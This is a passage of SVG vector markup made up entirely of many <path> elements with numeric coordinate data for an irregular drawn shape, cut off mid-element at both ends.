d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path 